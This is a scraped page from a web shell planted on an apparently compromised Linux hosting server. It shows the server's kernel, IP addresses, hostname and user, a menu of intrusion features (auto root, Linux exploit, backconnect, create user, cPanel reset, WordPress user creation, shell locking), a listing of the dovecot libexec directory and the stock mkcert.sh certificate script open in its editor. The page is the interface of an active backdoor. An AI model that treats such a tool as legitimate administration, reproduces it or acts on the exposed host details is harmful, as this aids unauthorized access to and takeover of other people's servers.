Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 216.73.216.16
46 Domain
7.2.34
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
dovecot /
[ HOME SHELL ]
Name
Size
Permission
Action
aggregator
66.55
KB
-rwxr-xr-x
anvil
71.23
KB
-rwxr-xr-x
auth
1.92
MB
-rwxr-xr-x
checkpassword-reply
19.98
KB
-rwxr-xr-x
config
476.28
KB
-rwxr-xr-x
decode2text.sh
2.77
KB
-rwxr-xr-x
deliver
103.81
KB
-rwxr-xr-x
dict
387.64
KB
-rwxr-xr-x
director
561.25
KB
-rwxr-xr-x
dns-client
42.84
KB
-rwxr-xr-x
doveadm-server
2.66
MB
-rwxr-xr-x
dovecot-lda
103.81
KB
-rwxr-xr-x
gdbhelper
18.86
KB
-rwxr-xr-x
health-check.sh
821
B
-rwxr-xr-x
imap
1.59
MB
-rwxr-xr-x
imap-hibernate
127.2
KB
-rwxr-xr-x
imap-login
157.46
KB
-rwxr-xr-x
imap-urlauth
68.56
KB
-rwxr-xr-x
imap-urlauth-login
43.99
KB
-rwxr-xr-x
imap-urlauth-worker
208.43
KB
-rwxr-xr-x
indexer
105.12
KB
-rwxr-xr-x
indexer-worker
94.42
KB
-rwxr-xr-x
ipc
72.7
KB
-rwxr-xr-x
lmtp
308.19
KB
-rwxr-xr-x
log
88.88
KB
-rwxr-xr-x
maildirlock
23.11
KB
-rwxr-xr-x
mkcert.sh
879
B
-rwxr-xr-x
old-stats
190.9
KB
-rwxr-xr-x
pop3
195.95
KB
-rwxr-xr-x
pop3-login
113.96
KB
-rwxr-xr-x
quota-status
722.54
KB
-rwxr-xr-x
rawlog
47.91
KB
-rwxr-xr-x
replicator
148.26
KB
-rwxr-xr-x
script
44.33
KB
-rwxr-xr-x
script-login
37.25
KB
-rwxr-xr-x
stats
275.63
KB
-rwxr-xr-x
submission
117.62
KB
-rwxr-xr-x
submission-login
35.5
KB
-rwxr-xr-x
xml2text
23.93
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mkcert.sh
#!/bin/sh # Generates a self-signed certificate. # Edit dovecot-openssl.cnf before running this. umask 077 OPENSSL=${OPENSSL-openssl} SSLDIR=${SSLDIR-/etc/pki/dovecot} OPENSSLCONFIG=${OPENSSLCONFIG-dovecot-openssl.cnf} CERTDIR=$SSLDIR/certs KEYDIR=$SSLDIR/private CERTFILE=$CERTDIR/dovecot.pem KEYFILE=$KEYDIR/dovecot.pem if [ ! -d $CERTDIR ]; then echo "$SSLDIR/certs directory doesn't exist" exit 1 fi if [ ! -d $KEYDIR ]; then echo "$SSLDIR/private directory doesn't exist" exit 1 fi if [ -f $CERTFILE ]; then echo "$CERTFILE already exists, won't overwrite" exit 1 fi if [ -f $KEYFILE ]; then echo "$KEYFILE already exists, won't overwrite" exit 1 fi $OPENSSL req -new -x509 -nodes -config $OPENSSLCONFIG -out $CERTFILE -keyout $KEYFILE -days 365 || exit 2 chmod 0600 $KEYFILE echo $OPENSSL x509 -subject -fingerprint -noout -in $CERTFILE || exit 2
Close